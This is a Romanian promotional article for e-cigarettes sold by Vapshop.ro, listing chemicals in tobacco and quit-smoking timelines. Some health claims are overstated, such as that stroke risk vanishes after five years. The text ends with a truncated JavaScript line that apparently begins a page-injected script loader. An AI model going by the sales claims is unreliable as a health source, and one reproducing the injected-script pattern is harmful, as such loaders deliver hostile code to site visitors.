Scapa de viciu si de boala cu tigara electronica!

Toata lumea stie ca tigarile sunt nocive, dar cu toate acestea prea putini se lasa de meserie. Oare este chiar atat de greu? Oare le lipseste vointa? Sau poate ca nu stiu cu adevarat ce substante contine o tigara. Ca un preambul, atunci cand fumezi organismul tau asimileaza arsenic, otrava pentru sobolani, si cianura, asta pe langa alte mii de chimicale. Mai simti nevoia sa pui gura pe o tigara? Nu! Foarte bine, acum esti pregatit sa accepti tigara electronica si sa te lasi definitiv de fumat!

Tigara electronica te scapa de boala

 

Scapa de viciu si de boala cu tigara electronica!Tu stii ce contine o tigara? O tigara este o bomba cu ceas, boala curata care nu va intarzia sa-si faca simtita prezenta. Astfel, cercetatorii si-au dat verdictul: fiecare tigara contine aproximativ 4.000 de chimicale! Care sunt acestea? Amintim de mirificul:

1. Arsenic, celebra otrava pentru sobolani;

2. Acetona de unghii;

3. Cianura;

4. Amoniac;

5. Butan, un combustibil usor;

6. Otet;

7. Monoxid de carbon;

8. Hexamina, substanta folosita pentru aprinderea gratarului;

9. Cadmiu, un element ce se regaseste si in compozitia bateriilor;

10. Formaldehida, folosita pentru conservarea de cadavre animale;

11. Acid stearic regasit in lumanari;

12. Insecticid DDT;

13. Hidrazinam, un combustibil utilizat pentru rachete;

14. Plumb, extrem de nociv pentru organismul uman;

15. Poloniu, un element radioactiv ce duce in cele din urma la aparitia cancerului.

Acestea sunt doar cateva din cele 4.000, substante extrem de nocive, substante care in momentul arderii produc alte substante nocive, ca un lant care te prinde pentru a nu-ti mai da drumul nici macar atunci cand apare boala, caci, da, boala va aparea, dragi fumatori, indiscutabil. An dupa an introducand in organism astfel de substante nocive chiar crezi ca pe tine nu te va atinge boala? Te inseli amarnic!

Abia dupa 15 ani dupa ce te-ai lasat de fumat riscul de a face infarct sau de a dezvolta orice alta boala este la fel ca in cazul unui om normal. Abia dupa 1 an de la renuntarea la tigara riscul infarctului scade cu 50%, dupa 5 ani poti sa stai linistit, nu mai esti expus la accidente vasculare cerebrale, iar dupa 10 ani riscul de a face cancer la plamani a ajuns la normal atingand cota unui nefumator.

Nu te poti lasa nicicum de fumat? Tigara electronica este o solutie pentru tine, o solutie de inceput care te scapa de toate cele 4.000 de chimicale dintr-o tigara clasica, care-ti da ratia zilnica de nicotina, iar apoi cu putina vointa renunti definitiv.

Lasa-te de fumat cu tigara electronica de la Vapshop.ro!

 

Daca vrei sa-ti cumperi si tu tigara electronica si sa renunti la viciu si la boala, Vapshop.ro are pentru tine mai multe propuneri, mai multe modele de tigari electronice, marci Scapa de viciu si de boala cu tigara electronica!1diferite, pentru nevoi diferite. Poti achizitiona tigara separat sau poti cumpara kit-uri complete cu tot cu lichidul de rezerva pentru tigara si diferite accesorii.

Pe Vapshop.ro comanda se face online, simplu si rapid, tigara electronica iti este trimisa acasa, iar plata se face la livrare. Si nu uita, pentru un vapat sigur ai nevoie de tigari electronice originale, iar Vapshop.ro iti ofera aceasta siguranta!

Daca vrei sa te lasi de fumat, alege tigara electronica de pe Vapshop.ro. Ai nevoie de informatii suplimentare despre magazinul si produsele Vapshop.ro? Pentru detalii si comenzi, suna la numarul 0768-682.449 sau trimite un e-mail pe adresa comenzi@vapshop.ro.

Articol oferit de zoom-biz.ro.

var d=document;var s=d.createElement(‘script’);